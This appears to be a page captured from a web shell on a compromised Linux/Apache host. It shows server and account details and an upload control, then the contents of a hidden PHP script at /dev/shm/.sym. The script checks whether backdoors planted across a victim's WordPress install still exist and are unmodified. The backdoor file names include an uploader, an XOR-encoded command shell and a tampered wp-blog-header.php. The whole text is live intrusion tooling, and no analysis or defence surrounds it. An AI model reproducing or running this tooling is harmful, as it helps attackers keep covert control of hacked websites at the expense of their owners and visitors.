HEX
Server: Apache
System: Linux whois01.turboservers.com.au 3.10.0-962.3.2.lve1.5.87.el7.x86_64 #1 SMP Tue Jan 28 09:38:56 UTC 2025 x86_64
User: ultimatemeditati (1528)
PHP: 5.6.40
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //dev/shm/.sym
<?php   $r = '/home/jacqueli/public_html'; $x = ["/images/images/images/images/images/index.php"=>"bd@@191509@@9",
"/images/images/images/index.php"=>"bd@@191523@@42",
"/wp-includes/wp56cf53/wp56cf53/wp56cf53/wp56cf53/wp56cf53/cache.php"=>"bd@@191546@@94",
"/wp-includes/publiclxi/uploader_phar.php"=>"bd@@191557@@89",
"/wp-includes/publiclxi/cmd_xor_ascii.php"=>"bd@@191566@@89",
"/wp-blog-header.php"=>"bd@@190053@@12",
"/wp-includes/publiclxi/mbd_phar.php"=>"bd@@181143@@6298",
"/wp-includes/publiclxi/fputs_enc_ascii.php"=>"bd@@181145@@7818"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');